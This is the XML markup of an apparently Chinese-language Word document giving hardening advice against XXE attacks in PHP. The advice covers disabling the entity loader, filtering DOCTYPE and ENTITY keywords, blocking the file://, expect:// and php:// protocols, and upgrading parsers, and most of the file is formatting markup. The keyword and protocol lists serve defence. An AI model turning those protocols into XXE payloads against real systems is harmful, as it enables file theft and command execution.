    <w:p w14:paraId="278FCDC0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全局检索代码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>libxml_disable_entity_loader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 必须强制设为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D7FCBD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拦截过滤XML恶意关键字：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE、&lt;!ENTITY、SYSTEM、PUBLIC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79074DAF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禁止XML解析器调用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>file://、expect://、php://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 等高危伪协议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FA2B6F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区分GET/POST接口风险：仅POST XML接口存在XXE高危风险，需重点防护</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0E2688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低版本PHP、老旧XML解析器必须 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>版本升级+代码加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>双重防护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4990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417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8"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.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B0F1ACD9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B0F1ACD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9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B8CEF35B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B8CEF3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BB64CFA9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BB64CFA9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12">
    <w:nsid w:val="BE923771"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BE923771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3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C8879AEF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C8879AE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5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E093A4B0"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E093A4B0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9">
    <w:nsid w:val="F4B5D9F5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F4B5D9F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0">
    <w:nsid w:val="F7735DC9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F7735DC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1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03D62ECE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03D62EC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4">
    <w:nsid w:val="0E640482"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E64048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5">
    <w:nsid w:val="1ACDE60F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="1ACDE60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243FCF68"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="243FCF6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7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25B654F3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="25B654F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9">
    <w:nsid w:val="2A8F537B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2A8F537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0">
    <w:nsid w:val="30FC5B15"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="30FC5B15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31">
    <w:nsid w:val="322D85CA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="322D85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39A0D9AC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="39A0D9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46A08BB8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46A08BB8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4">
    <w:nsid w:val="4C1BAE26"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C1BAE2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5">
    <w:nsid w:val="4C3D7A74"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4C3D7A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6">
    <w:nsid w:val="4D4DC07F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D4DC07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7">
    <w:nsid w:val="4D94DA66"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D94DA6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8">
    <w:nsid w:val="58765686"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="58765686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9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0">
    <w:nsid w:val="5A241D34"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A241D3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1">
    <w:nsid w:val="5E29AB5A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5E29AB5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2">
    <w:nsid w:val="5FFFB1A7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5FFFB1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3">
    <w:nsid w:val="60382F6E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="60382F6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4">
    <w:nsid w:val="629F7852"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="629F7852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45">
    <w:nsid w:val="72183CF9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72183CF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6">
    <w:nsid w:val="74C28B35"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="74C28B3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7">
    <w:nsid w:val="77ECEA79"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="77ECEA7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8">
    <w:nsid w:val="79AA4FA4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="79AA4FA4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49">
    <w:nsid w:val="7C246926"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7C24692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0">
    <w:nsid w:val="7DEC2089"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7DEC2089"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:color w:val="3370FF"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="48">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="49">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="50">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="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141363"/>
    <w:rsid w:val="3DC145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3647</Words>
  <Characters>7018</Characters>
  <TotalTime>5</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7334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2026-05-26T03:11:00Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
  <cp:lastModifiedBy>萧泽亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-26T06:09:58Z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{"Label":"1","ContentProducer":"001191110102MACQD9K64010000","ProduceID":"7644032816807971809","ReservedCode1":"","ContentPropagator":"","PropagateID":"","ReservedCode2":""}</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiN2U5ZDE1ZGIxZDg3OWNhMGU0YjJiZmZiOTc2ZGQxMGEiLCJ1c2VySWQiOiIyNDUwMjQ2ODMifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.26375</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ICV">
    <vt:lpwstr>C15B1549A46A4B26B9C078A448B94B64_13</vt:lpwstr>
  </property>
</Properties>
</file>